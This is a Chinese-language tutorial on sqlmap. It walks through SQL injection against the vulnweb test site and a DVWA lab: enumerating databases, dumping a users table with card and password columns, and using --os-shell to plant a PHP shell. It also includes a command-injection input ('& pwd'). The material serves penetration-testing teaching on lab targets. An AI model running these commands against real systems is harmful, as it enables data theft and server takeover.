Sqlmap专题
-u 后面接url地址
还可以用burpsuite导出的数据进行批量处理,如form-post形式的数据,用 -r burpsuite导出的数据包
实战:
目标网站:http://testphp.vulnweb.com/index.php
必须先找到了个可以显示结果的注入点
多浏览链接,如点击作者连接,找到注入点:http://testphp.vulnweb.com/artists.php?artist=2
给地址后加个',出现以下错误界面,说明可以尝试注入
接下来,检查注入点:
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=2" --batch
返回结果:发现是MYSQL数据库
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=2" --dbms mysql --dbs --batch
返回如下:看到2个数据库
[16:01:39] [INFO] retrieved: 'acuart'
available databases [2]:
[*] acuart
[*] information_schema
[16:01:39] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/testphp.vulnweb.com'
[*] ending @ 16:01:39 /2020-08-06/
枚举acuart 数据库中的tables:
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=2" --dbms mysql -D acuart --tables --batch
Database: acuart
[8 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
+-----------+
枚举users数据字段:
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=2" --dbms mysql -D acuart -T users --columns --batch
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| name | varchar(100) |
| address | mediumtext |
| cart | varchar(100) |
| cc | varchar(100) |
| email | varchar(100) |
| pass | varchar(100) |
| phone | varchar(100) |
| uname | varchar(100) |
+---------+--------------+
显示指定字段内容:
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=2" --dbms mysql -D acuart -T users -C name,address.cart --dump --batch
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=2" --dbms mysql -D acuart -T artists -C aname,adesc --dump --batch
利用Burpsuite,截获请求日志,保存下来
启动Burp的日志保存:Project options-》Misc-》logging->proxy->request,输入文件名rizhi
访问其他文章,或其他作者,request请求都被保存到rizhi文件
选取日志中的几条,如post 、get请求单独存成一个文件2.txt
sqlmap -l 2.txt --level 3 -v 2 --batch
在DVWA中,
选择Command Execution,并输入:10.10.10.143 & pwd来获得一个绝对路径,
选择SQL Injection,输入一个数,使用burpsuite进行抓包,获取cookie。
判断用户是否为dba,输入命令:
sqlmap -u "http://10.10.10.143/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=507jbjeheke50u6uu15e7rg7a7" --is-dba
接下来使用sqlmap进行交互式写shell
输入命令
sqlmap -u "http://10.10.10.143/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=507jbjeheke50u6uu15e7rg7a7" --os-shell
[18:23:12] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
>
脚本类型为PHP,所以输入4
出现以下提示:
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] y
[18:25:06] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
选择2
please provide a comma separate list of absolute directory paths: /owaspbwa/dvwa-git/vulnerabilities/exec(前面获得的当前路径)
如果此时不是DBA,--is-dba返回false,会直接退出。
正确则出现以下界面:
打开链接vulnerabilities/exec/tmpujhum.php